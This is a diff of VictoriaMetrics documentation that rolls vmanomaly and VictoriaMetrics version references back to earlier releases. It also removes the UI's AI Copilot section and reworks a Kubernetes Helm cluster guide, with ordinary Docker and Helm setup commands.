docker pull victoriametrics/vmanomaly:v1.28.6 && docker image tag victoriametrics/vmanomaly:v1.28.7 vmanomaly
|
||||
```
|
||||
|
||||
```sh
|
||||
|
||||
@@ -45,8 +45,8 @@ There are 2 types of compatibilitity to consider when migrating in stateful mode
|
||||
|
||||
| Group start | Group end | Compatibility | Notes |
|
||||
|---------|--------- |------------|-------|
|
||||
| [v1.29.0](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1290) | Latest* | Fully Compatible | Just a placeholder for new releases |
|
||||
| [v1.26.0](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1262) | [v1.29.0](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1290) | Fully Compatible | [v1.28.0](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1280) introduced [rolling](https://docs.victoriametrics.com/anomaly-detection/components/models/#rolling-models) model class drop in favor of [online](https://docs.victoriametrics.com/anomaly-detection/components/models/#online-models) models (`rolling_quantile` and `std` models), however, it does not impact compatibility, as artifacts were not produced by default for rolling models. Also, offline `mad` and `zscore` models are redirecting to their respective online counterparts since [v1.28.4](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1284). |
|
||||
| [v1.28.7](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1287) | Latest* | Fully Compatible | Just a placeholder for new releases |
|
||||
| [v1.26.0](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1262) | [v1.28.7](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1287) | Fully Compatible | [v1.28.0](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1280) introduced [rolling](https://docs.victoriametrics.com/anomaly-detection/components/models/#rolling-models) model class drop in favor of [online](https://docs.victoriametrics.com/anomaly-detection/components/models/#online-models) models (`rolling_quantile` and `std` models), however, it does not impact compatibility, as artifacts were not produced by default for rolling models. Also, offline `mad` and `zscore` models are redirecting to their respective online counterparts since [v1.28.4](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1284). |
|
||||
| [v1.25.3](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1253) | [v1.26.0](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1270) | Partially Compatible* | [v1.25.3](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1253) introduced `forecast_at` argument for base [univariate](https://docs.victoriametrics.com/anomaly-detection/components/models/#univariate-models) and `Prophet` [models](https://docs.victoriametrics.com/anomaly-detection/components/models/#prophet), however, itself remains backward-reversible from newer states like [v1.26.2](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1262), [v1.27.0](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1270). (All models except `isolation_forest_multivariate` class will be dropped) |
|
||||
| [v1.25.1](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1251) | [v1.25.2](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1252) | Fully Compatible | In [v1.25.1](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1251) there was a change to `vmanomaly.db` metadata database format, so migrating from v1.24.0-v1.25.0 requires deletion of a state, see note above the table |
|
||||
| [v1.24.1](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1241) | [v1.25.0](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1250) | Partially Compatible* | In [v1.25.0](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1250) there were changes to **data dump layout** and to `online_quantile` and `isolation_forest_multivariate` [model](https://docs.victoriametrics.com/anomaly-detection/components/models/) states, so to migrate from v1.24.0-v1.24.1 it is recommended to drop the state |
|
||||
|
||||
@@ -122,7 +122,7 @@ Below are the steps to get `vmanomaly` up and running inside a Docker container:
|
||||
1. Pull Docker image:
|
||||
|
||||
```sh
|
||||
docker pull victoriametrics/vmanomaly:v1.29.0
|
||||
docker pull victoriametrics/vmanomaly:v1.28.7
|
||||
```
|
||||
|
||||
2. Create the license file with your license key.
|
||||
@@ -142,7 +142,7 @@ docker run -it \
|
||||
-v ./license:/license \
|
||||
-v ./config.yaml:/config.yaml \
|
||||
-p 8490:8490 \
|
||||
victoriametrics/vmanomaly:v1.29.0 \
|
||||
victoriametrics/vmanomaly:v1.28.7 \
|
||||
/config.yaml \
|
||||
--licenseFile=/license \
|
||||
--loggerLevel=INFO \
|
||||
@@ -159,7 +159,7 @@ docker run -it \
|
||||
-e VMANOMALY_DATA_DUMPS_DIR=/tmp/vmanomaly/data \
|
||||
-e VMANOMALY_MODEL_DUMPS_DIR=/tmp/vmanomaly/models \
|
||||
-p 8490:8490 \
|
||||
victoriametrics/vmanomaly:v1.29.0 \
|
||||
victoriametrics/vmanomaly:v1.28.7 \
|
||||
/config.yaml \
|
||||
--licenseFile=/license \
|
||||
--loggerLevel=INFO \
|
||||
@@ -172,7 +172,7 @@ services:
|
||||
# ...
|
||||
vmanomaly:
|
||||
container_name: vmanomaly
|
||||
image: victoriametrics/vmanomaly:v1.29.0
|
||||
image: victoriametrics/vmanomaly:v1.28.7
|
||||
# ...
|
||||
restart: always
|
||||
volumes:
|
||||
@@ -305,11 +305,11 @@ writer:
|
||||
|
||||
### UI
|
||||
|
||||
{{% available_from "v1.26.0" anomaly %}} `vmanomaly`'s built-in web UI can be used for prototyping and interactive experimenting to produce vmanomaly's and vmalert's configuration files. Please refer to the [UI documentation](https://docs.victoriametrics.com/anomaly-detection/ui/) for detailed instructions and examples. {{% available_from "v1.29.0" anomaly %}} Connect MCP server to the UI to benefit from better response quality and tool access in the UI Copilot, which provides AI-assisted configuration generation and debugging capabilities. See the [UI documentation](https://docs.victoriametrics.com/anomaly-detection/ui/#ai-assistance) for instructions on how to set it up.
|
||||
{{% available_from "v1.26.0" anomaly %}} `vmanomaly`'s built-in web UI can be used for prototyping and interactive experimenting to produce vmanomaly's and vmalert's configuration files. Please refer to the [UI documentation](https://docs.victoriametrics.com/anomaly-detection/ui/) for detailed instructions and examples.
|
||||
|
||||

|
||||
> [!TIP]
|
||||
> Public playgrounds with pre-configured `vmanomaly` instances and VictoriaMetrics/VictoriaLogs/VictoriaTraces datasources are available for interactive experimenting without the need to set up your own instance or getting an enterprise license. You can find them in the [UI documentation](https://docs.victoriametrics.com/anomaly-detection/ui/#playgrounds) or access them directly via the links - [metrics](https://play-vmanomaly.victoriametrics.com/metrics/), [logs](https://play-vmanomaly.victoriametrics.com/logs/), [traces](https://play-vmanomaly.victoriametrics.com/traces/) - or embedded versions in the collapsible blocks.
|
||||
Public playgrounds with pre-configured `vmanomaly` instances and VictoriaMetrics/VictoriaLogs/VictoriaTraces datasources are available for interactive experimenting without the need to set up your own instance or getting an enterprise license. You can find them in the [UI documentation](https://docs.victoriametrics.com/anomaly-detection/ui/#playgrounds) or access them directly via the links - [metrics](https://play-vmanomaly.victoriametrics.com/metrics/), [logs](https://play-vmanomaly.victoriametrics.com/logs/), [traces](https://play-vmanomaly.victoriametrics.com/traces/) - or embedded versions in the collapsible blocks.
|
||||
|
||||
{{% collapse name="Playground on VictoriaMetrics Datasource" %}}
|
||||
|
||||
|
||||
@@ -55,7 +55,7 @@ Get started with VictoriaMetrics Anomaly Detection by following our guides and i
|
||||
|
||||
- **Quickstart**: Learn how to quickly set up `vmanomaly` by following the [Quickstart Guide](https://docs.victoriametrics.com/anomaly-detection/quickstart/).
|
||||
- **UI**: Explore anomaly detection configurations through the [vmanomaly UI](https://docs.victoriametrics.com/anomaly-detection/ui/).
|
||||
- **MCP**: Allow AI to assist you in generating service and alerting configurations, answering questions, planning migration with the [MCP Server](https://github.com/VictoriaMetrics/mcp-vmanomaly). Find the setup guide how to setup and use it [here](https://github.com/VictoriaMetrics/mcp-vmanomaly?tab=readme-ov-file#installation).
|
||||
- **MCP**: Allow AI to assist you in generating service and alerting configurations, answering questions, planning migration with the [MCP Server](https://github.com/VictoriaMetrics-Community/mcp-vmanomaly). Find the setup guide how to setup and use it [here](https://github.com/VictoriaMetrics-Community/mcp-vmanomaly?tab=readme-ov-file#installation).
|
||||
- **Integration**: Integrate anomaly detection into your existing observability stack. Find detailed steps [here](https://docs.victoriametrics.com/anomaly-detection/guides/guide-vmanomaly-vmalert/).
|
||||
- **Anomaly Detection Presets**: Enable anomaly detection on predefined sets of metrics. Learn more [here](https://docs.victoriametrics.com/anomaly-detection/presets/).
|
||||
|
||||
|
||||
@@ -183,94 +183,6 @@ The best applications of this mode are:
|
||||
|
||||
> However, the UI can be **combined with existing production jobs of anomaly detection, as it is available in non-blocking mode for all running vmanomaly instances** {{% available_from "v1.26.0" anomaly %}}, regardless of the preset or configuration used, just at a cost of increased resource usage.
|
||||
|
||||
## AI Assistance
|
||||
|
||||
{{% available_from "v1.29.0" anomaly %}} Copilot is an AI assistant built into the vmanomaly UI. It understands current anomaly detection configuration in the UI and helps iterate faster and obtain better results - without leaving the UI, searching the docs manually, or being an expert in anomaly detection.
|
||||
|
||||
### What you can do with Copilot
|
||||
|
||||
- **Ask questions** about any model (e.g. [Prophet](https://docs.victoriametrics.com/anomaly-detection/components/models/#prophet) or [Z-score](https://docs.victoriametrics.com/anomaly-detection/components/models/#online-z-score) — parameters, trade-offs, when to use each)
|
||||
- **Improve detection quality** — describe what's wrong ("too many false positives", "missing spikes") and Copilot reads the config, searches the docs, and proposes a validated configuration change to fix the issue.
|
||||
- **Get config suggestions inline** — suggestions appear as interactive cards with an explanation and a YAML diff; click **Apply** to write the change directly to your current settings, or **Decline** to keep the conversation going.
|
||||
|
||||
### How it works
|
||||
|
||||
Copilot appears as a **chat popup** anchored to the bottom-right corner of the page. The panel is resizable by dragging its left edge, and can be opened or closed by clicking the respective icon.
|
||||
|
||||
> [!TIP] Copilot is context-aware
|
||||
> It reads your active model, scheduler, and anomaly settings from the UI automatically, so you don't need to paste your config manually.
|
||||
|
||||
### Configuration
|
||||
|
||||
AI Assistant is disabled by default; enable it with `VMANOMALY_COPILOT_ENABLED=true`, then configure an LLM provider API key and, optionally, a model. Once enabled and configured, Copilot will appear as a chat popup in the bottom-right corner of the UI.
|
||||
|
||||
|
||||
|
||||
Supported providers and model formats:
|
||||
|
||||
- **Anthropic** — set `ANTHROPIC_API_KEY`; model format: `anthropic:<model>`
|
||||
- Examples: `claude-haiku-4-5`, `claude-sonnet-4-6`; see [full list](https://platform.claude.com/docs/en/about-claude/models/overview#latest-models-comparison)
|
||||
- **OpenAI** — set `OPENAI_API_KEY`; model format: `openai:<model>`
|
||||
- Examples: `gpt-5-mini`, `gpt-5.2`; see [full list](https://platform.openai.com/docs/models)
|
||||
|
||||
Set exactly one provider key matching your selected model provider:
|
||||
|
||||
```bash
|
||||
# Anthropic
|
||||
export ANTHROPIC_API_KEY=your_key_here
|
||||
|
||||
# or OpenAI
|
||||
export OPENAI_API_KEY=your_key_here
|
||||
```
|
||||
|
||||
Optionally override the default model:
|
||||
|
||||
```bash
|
||||
export VMANOMALY_COPILOT_MODEL=openai:gpt-5-mini
|
||||
```
|
||||
|
||||
### MCP tools server
|
||||
|
||||
Connects Copilot to [mcp-vmanomaly](https://github.com/VictoriaMetrics/mcp-vmanomaly) for full tool access (built-in docs, models configuration and validation, alerts recommendation, service healthchecks, etc.). Full [tools list](https://github.com/VictoriaMetrics/mcp-vmanomaly?tab=readme-ov-file#toolset):
|
||||
|
||||
> [!NOTE]
|
||||
> Only `http` [mode](https://github.com/VictoriaMetrics/mcp-vmanomaly?tab=readme-ov-file#modes) is supported. Set `VMANOMALY_MCP_SERVER_URL` to the MCP server HTTP endpoint. The server must be reachable from within the vmanomaly container.
|
||||
|
||||
For example:
|
||||
|
||||
```bash
|
||||
export VMANOMALY_MCP_SERVER_URL=http://localhost:8081/mcp
|
||||
```
|
||||
|
||||
Use `localhost` only when the vmanomaly process can reach the MCP server on its own loopback interface (for example, both running on the host). If vmanomaly runs in a separate Docker container, use a reachable container or host address instead.
|
||||
|
||||
**Example**: if using Docker, run `mcp-vmanomaly` and vmanomaly UI in the same Docker network so they can reach each other by container name:
|
||||
|
||||
```bash
|
||||
docker network create vmanomaly-network
|
||||
|
||||
docker run -d --rm \
|
||||
--name mcp-vmanomaly \
|
||||
--network vmanomaly-network \
|
||||
-e VMANOMALY_ENDPOINT=http://vmanomaly-instance:8490 \
|
||||
-e MCP_SERVER_MODE=http \
|
||||
-e MCP_LISTEN_ADDR=:8081 \
|
||||
ghcr.io/victoriametrics/mcp-vmanomaly
|
||||
|
||||
docker run -it --rm \
|
||||
--name vmanomaly-instance \
|
||||
--network vmanomaly-network \
|
||||
-e VMANOMALY_COPILOT_ENABLED=true \
|
||||
-e OPENAI_API_KEY="$OPENAI_API_KEY" \
|
||||
-e VMANOMALY_COPILOT_MODEL=openai:gpt-5-mini \
|
||||
-e VMANOMALY_MCP_SERVER_URL=http://mcp-vmanomaly:8081/mcp \
|
||||
-p 8080:8080 \
|
||||
-p 8490:8490 \
|
||||
victoriametrics/vmanomaly:v1.29.0 \
|
||||
vmanomaly_config.yaml
|
||||
```
|
||||
|
||||
|
||||
## UI Navigation
|
||||
|
||||
The vmanomaly UI provides a user-friendly interface for exploring and configuring anomaly detection models. The main components of the UI include:
|
||||
@@ -589,15 +501,6 @@ If the **results** look good and the **model configuration should be deployed in
|
||||
|
||||
## Changelog
|
||||
|
||||
### v1.5.0
|
||||
Released: 2026-03-05
|
||||
|
||||
vmanomaly version: [v1.29.0](https://docs.victoriametrics.com/anomaly-detection/changelog/#v1290)
|
||||
|
||||
- FEATURE: Allowed AI assistance use for documentation Q&A, model configuration suggestion and application, optionally backed by [MCP Server tools](https://github.com/VictoriaMetrics/mcp-vmanomaly/tree/main). Please refer to [AI Assistance](https://docs.victoriametrics.com/anomaly-detection/ui/#ai-assistance) section for details.
|
||||
- FEATURE: Added filtering of timeseries in the Visualization Panel by labels and statistics (e.g. anomaly count) to focus on the most relevant series when many series are returned by the query.
|
||||
- BUGFIX: Fixed missing datapoints in [BacktestingScheduler](https://docs.victoriametrics.com/anomaly-detection/components/scheduler/#backtesting-scheduler) windows combined with [exact mode](https://docs.victoriametrics.com/anomaly-detection/components/scheduler/#defining-inference-timeframe-1), leading to "gaps" in plotted predictions and scores.
|
||||
|
||||
### v1.4.3
|
||||
Released: 2026-02-09
|
||||
|
||||
|
||||
@@ -136,21 +136,21 @@ models:
|
||||
|
||||
Here's how default (backward-compatible) behavior looks like - anomalies will be tracked in `both` directions (`y > yhat` or `y < yhat`). This is useful when there is no domain expertise to filter the required direction.
|
||||
|
||||

|
||||

|
||||
|
||||
|
||||
When set to `above_expected`, anomalies are tracked only when `y > yhat`.
|
||||
|
||||
*Example metrics*: Error rate, response time, page load time, number of failed transactions - metrics where *lower values are better*, so **higher** values are typically tracked.
|
||||
|
||||

|
||||

|
||||
|
||||
|
||||
When set to `below_expected`, anomalies are tracked only when `y < yhat`.
|
||||
|
||||
*Example metrics*: Service Level Agreement (SLA) compliance, conversion rate, Customer Satisfaction Score (CSAT) - metrics where *higher values are better*, so **lower** values are typically tracked.
|
||||
|
||||

|
||||

|
||||
|
||||
|
||||
Config with a split example:
|
||||
@@ -199,13 +199,13 @@ reader:
|
||||
|
||||
Visualizations below demonstrate this concept; the green zone defined as the `[yhat - min_dev_from_expected, yhat + min_dev_from_expected]` range excludes actual data points (`y`) from generating anomaly scores if they fall within that range.
|
||||
|
||||

|
||||

|
||||
|
||||
|
||||

|
||||

|
||||
|
||||
|
||||

|
||||

|
||||
|
||||
Example config of how to use this param based on query results:
|
||||
|
||||
@@ -1219,7 +1219,7 @@ monitoring:
|
||||
Let's pull the docker image for `vmanomaly`:
|
||||
|
||||
```sh
|
||||
docker pull victoriametrics/vmanomaly:v1.29.0
|
||||
docker pull victoriametrics/vmanomaly:v1.28.7
|
||||
```
|
||||
|
||||
Now we can run the docker container putting as volumes both config and model file:
|
||||
@@ -1233,7 +1233,7 @@ docker run -it \
|
||||
-v $(PWD)/license:/license \
|
||||
-v $(PWD)/custom_model.py:/vmanomaly/model/custom.py \
|
||||
-v $(PWD)/custom.yaml:/config.yaml \
|
||||
victoriametrics/vmanomaly:v1.29.0 /config.yaml \
|
||||
victoriametrics/vmanomaly:v1.28.7 /config.yaml \
|
||||
--licenseFile=/license
|
||||
--watch
|
||||
```
|
||||
|
||||
|
Before Width: | Height: | Size: 32 KiB After Width: | Height: | Size: 32 KiB |
|
Before Width: | Height: | Size: 29 KiB After Width: | Height: | Size: 29 KiB |
|
Before Width: | Height: | Size: 32 KiB After Width: | Height: | Size: 32 KiB |
|
Before Width: | Height: | Size: 30 KiB After Width: | Height: | Size: 30 KiB |
|
Before Width: | Height: | Size: 30 KiB After Width: | Height: | Size: 30 KiB |
|
Before Width: | Height: | Size: 32 KiB After Width: | Height: | Size: 32 KiB |
@@ -10,9 +10,9 @@ sitemap:
|
||||
|
||||
- To use *vmanomaly*, part of the enterprise package, a license key is required. Obtain your key [here](https://victoriametrics.com/products/enterprise/trial/) for this tutorial or for enterprise use.
|
||||
- In the tutorial, we'll be using the following VictoriaMetrics components:
|
||||
- [VictoriaMetrics Single-Node](https://docs.victoriametrics.com/victoriametrics/single-server-victoriametrics/) (v1.137.0)
|
||||
- [vmalert](https://docs.victoriametrics.com/victoriametrics/vmalert/) (v1.137.0)
|
||||
- [vmagent](https://docs.victoriametrics.com/victoriametrics/vmagent/) (v1.137.0)
|
||||
- [VictoriaMetrics Single-Node](https://docs.victoriametrics.com/victoriametrics/single-server-victoriametrics/) (v1.136.0)
|
||||
- [vmalert](https://docs.victoriametrics.com/victoriametrics/vmalert/) (v1.136.0)
|
||||
- [vmagent](https://docs.victoriametrics.com/victoriametrics/vmagent/) (v1.136.0)
|
||||
- [Grafana](https://grafana.com/) (v.10.2.1)
|
||||
- [Docker](https://docs.docker.com/get-docker/) and [Docker Compose](https://docs.docker.com/compose/)
|
||||
- [Node exporter](https://github.com/prometheus/node_exporter#node-exporter) (v1.7.0) and [Alertmanager](https://prometheus.io/docs/alerting/latest/alertmanager/) (v0.27.0)
|
||||
@@ -323,7 +323,7 @@ Let's wrap it all up together into the `docker-compose.yml` file.
|
||||
services:
|
||||
vmagent:
|
||||
container_name: vmagent
|
||||
image: victoriametrics/vmagent:v1.137.0
|
||||
image: victoriametrics/vmagent:v1.136.0
|
||||
depends_on:
|
||||
- "victoriametrics"
|
||||
ports:
|
||||
@@ -340,7 +340,7 @@ services:
|
||||
|
||||
victoriametrics:
|
||||
container_name: victoriametrics
|
||||
image: victoriametrics/victoria-metrics:v1.137.0
|
||||
image: victoriametrics/victoria-metrics:v1.136.0
|
||||
ports:
|
||||
- 8428:8428
|
||||
volumes:
|
||||
@@ -373,7 +373,7 @@ services:
|
||||
|
||||
vmalert:
|
||||
container_name: vmalert
|
||||
image: victoriametrics/vmalert:v1.137.0
|
||||
image: victoriametrics/vmalert:v1.136.0
|
||||
depends_on:
|
||||
- "victoriametrics"
|
||||
ports:
|
||||
@@ -395,7 +395,7 @@ services:
|
||||
restart: always
|
||||
vmanomaly:
|
||||
container_name: vmanomaly
|
||||
image: victoriametrics/vmanomaly:v1.29.0
|
||||
image: victoriametrics/vmanomaly:v1.28.5
|
||||
depends_on:
|
||||
- "victoriametrics"
|
||||
ports:
|
||||
|
||||
@@ -7,7 +7,7 @@ sitemap:
|
||||
disable: true
|
||||
---
|
||||
|
||||
This guide walks you through deploying VictoriaMetrics and VictoriaLogs on Kubernetes, and collecting [metrics](https://docs.victoriametrics.com/victoriametrics/data-ingestion/opentelemetry-collector/) and [logs](https://docs.victoriametrics.com/victorialogs/data-ingestion/opentelemetry/) from a Go application either directly or via the [OpenTelemetry Collector](https://opentelemetry.io/docs/collector/).
|
||||
This guide walks you through deploying VictoriaMetrics and VictoriaLogs on Kubernetes, and collecting [metrics](https://docs.victoriametrics.com/victoriametrics/single-server-victoriametrics/#sending-data-via-opentelemetry) and [logs](https://docs.victoriametrics.com/victorialogs/data-ingestion/opentelemetry/) from a Go application either directly or via the [OpenTelemetry Collector](https://opentelemetry.io/docs/collector/).
|
||||
|
||||
## Pre-Requirements
|
||||
|
||||
@@ -316,4 +316,4 @@ using query `service.name: unknown_service:otel`.
|
||||
## Limitations
|
||||
|
||||
- VictoriaMetrics and VictoriaLogs do not support experimental JSON encoding [format](https://github.com/open-telemetry/opentelemetry-proto/blob/main/examples/metrics.json).
|
||||
|
||||
- VictoriaMetrics supports only the `AggregationTemporalityCumulative` type for [histogram](https://opentelemetry.io/docs/specs/otel/metrics/data-model/#histogram) and [summary](https://opentelemetry.io/docs/specs/otel/metrics/data-model/#summary-legacy). Either consider using cumulative temporality or use the [`delta-to-cumulative processor`](https://github.com/open-telemetry/opentelemetry-collector-contrib/tree/main/processor/deltatocumulativeprocessor) to convert to cumulative temporality in OpenTelemetry Collector.
|
||||
|
||||
@@ -249,27 +249,27 @@ services:
|
||||
- grafana_data:/var/lib/grafana/
|
||||
|
||||
vmsingle:
|
||||
image: victoriametrics/victoria-metrics:v1.137.0
|
||||
image: victoriametrics/victoria-metrics:v1.136.0
|
||||
command:
|
||||
- -httpListenAddr=0.0.0.0:8429
|
||||
|
||||
vmstorage:
|
||||
image: victoriametrics/vmstorage:v1.137.0-cluster
|
||||
image: victoriametrics/vmstorage:v1.136.0-cluster
|
||||
|
||||
vminsert:
|
||||
image: victoriametrics/vminsert:v1.137.0-cluster
|
||||
image: victoriametrics/vminsert:v1.136.0-cluster
|
||||
command:
|
||||
- -storageNode=vmstorage:8400
|
||||
- -httpListenAddr=0.0.0.0:8480
|
||||
|
||||
vmselect:
|
||||
image: victoriametrics/vmselect:v1.137.0-cluster
|
||||
image: victoriametrics/vmselect:v1.136.0-cluster
|
||||
command:
|
||||
- -storageNode=vmstorage:8401
|
||||
- -httpListenAddr=0.0.0.0:8481
|
||||
|
||||
vmagent:
|
||||
image: victoriametrics/vmagent:v1.137.0
|
||||
image: victoriametrics/vmagent:v1.136.0
|
||||
volumes:
|
||||
- ./scrape.yaml:/etc/vmagent/config.yaml
|
||||
command:
|
||||
@@ -278,7 +278,7 @@ services:
|
||||
- -remoteWrite.url=http://vmsingle:8429/api/v1/write
|
||||
|
||||
vmgateway-cluster:
|
||||
image: victoriametrics/vmgateway:v1.137.0-enterprise
|
||||
image: victoriametrics/vmgateway:v1.136.0-enterprise
|
||||
ports:
|
||||
- 8431:8431
|
||||
volumes:
|
||||
@@ -294,7 +294,7 @@ services:
|
||||
- -auth.oidcDiscoveryEndpoints=http://keycloak:8080/realms/master/.well-known/openid-configuration
|
||||
|
||||
vmgateway-single:
|
||||
image: victoriametrics/vmgateway:v1.137.0-enterprise
|
||||
image: victoriametrics/vmgateway:v1.136.0-enterprise
|
||||
ports:
|
||||
- 8432:8431
|
||||
volumes:
|
||||
@@ -405,7 +405,7 @@ Once iDP configuration is done, vmagent configuration needs to be updated to use
|
||||
|
||||
```yaml
|
||||
vmagent:
|
||||
image: victoriametrics/vmagent:v1.137.0
|
||||
image: victoriametrics/vmagent:v1.136.0
|
||||
volumes:
|
||||
- ./scrape.yaml:/etc/vmagent/config.yaml
|
||||
- ./vmagent-client-secret:/etc/vmagent/oauth2-client-secret
|
||||
|
||||
@@ -6,62 +6,67 @@ build:
|
||||
sitemap:
|
||||
disable: true
|
||||
---
|
||||
**This guide covers:**
|
||||
|
||||
This guide walks you through deploying a VictoriaMetrics cluster version on Kubernetes.
|
||||
* The setup of a [VictoriaMetrics cluster](https://docs.victoriametrics.com/victoriametrics/cluster-victoriametrics/) in [Kubernetes](https://kubernetes.io/) via Helm charts
|
||||
* How to scrape metrics from k8s components using service discovery
|
||||
* How to visualize stored data
|
||||
* How to store metrics in [VictoriaMetrics](https://victoriametrics.com) tsdb
|
||||
|
||||
By the end of this guide, you will know:
|
||||
|
||||
- How to install and configure [VictoriaMetrics cluster version](https://docs.victoriametrics.com/victoriametrics/cluster-victoriametrics/) using Helm.
|
||||
- How to scrape metrics from Kubernetes components using service discovery.
|
||||
- How to store metrics in [VictoriaMetrics](https://victoriametrics.com) time-series database.
|
||||
- How to visualize metrics in Grafana
|
||||
**Precondition**
|
||||
|
||||
We will use:
|
||||
* [Kubernetes cluster 1.31.1-gke.1678000](https://cloud.google.com/kubernetes-engine)
|
||||
> We use GKE cluster from [GCP](https://cloud.google.com/) but this guide is also applied on any Kubernetes cluster. For example [Amazon EKS](https://aws.amazon.com/ru/eks/).
|
||||
* [Helm 3.14+](https://helm.sh/docs/intro/install)
|
||||
* [kubectl 1.31](https://kubernetes.io/docs/tasks/tools/install-kubectl)
|
||||
|
||||
- [Kubernetes cluster 1.34+](https://cloud.google.com/kubernetes-engine)
|
||||
- [Helm 4.1+](https://helm.sh/docs/intro/install)
|
||||
- [kubectl 1.34+](https://kubernetes.io/docs/tasks/tools/install-kubectl)
|
||||
|
||||
> We use a GKE cluster from [GCP](https://cloud.google.com/), but this guide can also be applied to any Kubernetes cluster. For example, [Amazon EKS](https://aws.amazon.com/ru/eks/) or an on-premises cluster.
|
||||

|
||||
|
||||
## 1. VictoriaMetrics Helm repository
|
||||
|
||||
To start, add the VictoriaMetrics Helm repository with the following commands:
|
||||
You need to add the VictoriaMetrics Helm repository to install VictoriaMetrics components. We’re going to use [VictoriaMetrics Cluster](https://docs.victoriametrics.com/victoriametrics/cluster-victoriametrics/). You can do this by running the following command:
|
||||
|
||||
```shell
|
||||
helm repo add vm https://victoriametrics.github.io/helm-charts/
|
||||
```
|
||||
|
||||
Update Helm repositories:
|
||||
|
||||
```shell
|
||||
helm repo update
|
||||
```
|
||||
|
||||
To verify that everything is set up correctly, you may run this command:
|
||||
To verify that everything is set up correctly you may run this command:
|
||||
|
||||
```shell
|
||||
helm search repo vm/
|
||||
```
|
||||
|
||||
You should see a list similar to this:
|
||||
The expected output is:
|
||||
|
||||
```text
|
||||
NAME CHART VERSION APP VERSION DESCRIPTION
|
||||
vm/victoria-metrics-cluster 0.34.0 v1.135.0 VictoriaMetrics Cluster version - high-performa...
|
||||
vm/victoria-metrics-agent 0.31.0 v1.135.0 VictoriaMetrics Agent - collects metrics from v...
|
||||
...(the list continues)...
|
||||
NAME CHART VERSION APP VERSION DESCRIPTION
|
||||
vm/victoria-logs-single 0.9.3 v1.16.0 Victoria Logs Single version - high-performance...
|
||||
vm/victoria-metrics-agent 0.17.2 v1.113.0 Victoria Metrics Agent - collects metrics from ...
|
||||
vm/victoria-metrics-alert 0.15.0 v1.113.0 Victoria Metrics Alert - executes a list of giv...
|
||||
vm/victoria-metrics-anomaly 1.9.0 v1.21.0 Victoria Metrics Anomaly Detection - a service ...
|
||||
vm/victoria-metrics-auth 0.10.0 v1.113.0 Victoria Metrics Auth - is a simple auth proxy ...
|
||||
vm/victoria-metrics-cluster 0.19.2 v1.113.0 Victoria Metrics Cluster version - high-perform...
|
||||
vm/victoria-metrics-common 0.0.42 Victoria Metrics Common - contains shared templ...
|
||||
vm/victoria-metrics-distributed 0.9.0 v1.113.0 A Helm chart for Running VMCluster on Multiple ...
|
||||
vm/victoria-metrics-gateway 0.8.0 v1.113.0 Victoria Metrics Gateway - Auth & Rate-Limittin...
|
||||
vm/victoria-metrics-k8s-stack 0.39.0 v1.113.0 Kubernetes monitoring on VictoriaMetrics stack....
|
||||
vm/victoria-metrics-operator 0.43.0 v0.54.1 Victoria Metrics Operator
|
||||
vm/victoria-metrics-single 0.15.1 v1.113.0 Victoria Metrics Single version - high-performa...
|
||||
```
|
||||
|
||||
## 2. Install VictoriaMetrics Cluster from the Helm chart
|
||||
|
||||
A [VictoriaMetrics cluster](https://docs.victoriametrics.com/victoriametrics/cluster-victoriametrics/) consists of three services:
|
||||
|
||||
- `vminsert`: receives incoming metrics and distributes them across `vmstorage` nodes via consistent hashing on metric names and labels.
|
||||
- `vmstorage`: stores raw data and serves queries filtered by time range and labels.
|
||||
- `vmselect`: executes queries by fetching data across all configured `vmstorage` nodes.
|
||||
|
||||

|
||||
|
||||
To get started, create a config file for the VictoriaMetrics Helm chart:
|
||||
Run this command in your terminal:
|
||||
|
||||
```sh
|
||||
cat <<EOF >victoria-metrics-cluster-values.yml
|
||||
cat <<EOF | helm install vmcluster vm/victoria-metrics-cluster -f -
|
||||
vmselect:
|
||||
podAnnotations:
|
||||
prometheus.io/scrape: "true"
|
||||
@@ -79,26 +84,19 @@ vmstorage:
|
||||
EOF
|
||||
```
|
||||
|
||||
The config file defines two settings for the VictoriaMetrics services:
|
||||
* By running `Helm install vmcluster vm/victoria-metrics-cluster` we install [VictoriaMetrics cluster](https://docs.victoriametrics.com/victoriametrics/cluster-victoriametrics/) to default [namespace](https://kubernetes.io/docs/concepts/overview/working-with-objects/namespaces/) inside your cluster.
|
||||
* By adding `podAnnotations: prometheus.io/scrape: "true"` we enable the scraping of metrics from the vmselect, vminsert and vmstorage pods.
|
||||
* By adding `podAnnotations:prometheus.io/port: "some_port" ` we enable the scraping of metrics from the vmselect, vminsert and vmstorage pods from their ports as well.
|
||||
|
||||
- `podAnnotations: prometheus.io/scrape: "true"` enables automatic service discovery and metric scraping from the VictoriaMetrics pods.
|
||||
- `podAnnotations:prometheus.io/port: "<port-number>"` defines which port numbers to target for scraping metrics from the VictoriaMetrics pods.
|
||||
|
||||
Next, install VictoriaMetrics cluster version with the following command:
|
||||
|
||||
```sh
|
||||
helm install vmcluster vm/victoria-metrics-cluster -f victoria-metrics-cluster-values.yml
|
||||
```
|
||||
|
||||
The expected output should look like this:
|
||||
As a result of this command you will see the following output:
|
||||
|
||||
```text
|
||||
NAME: vmcluster
|
||||
LAST DEPLOYED: Wed Feb 4 12:00:55 2026
|
||||
LAST DEPLOYED: Fri Mar 21 11:55:50 2025
|
||||
NAMESPACE: default
|
||||
STATUS: deployed
|
||||
REVISION: 1
|
||||
DESCRIPTION: Install complete
|
||||
TEST SUITE: None
|
||||
NOTES:
|
||||
Write API:
|
||||
@@ -143,29 +141,16 @@ for example - inside the Kubernetes cluster:
|
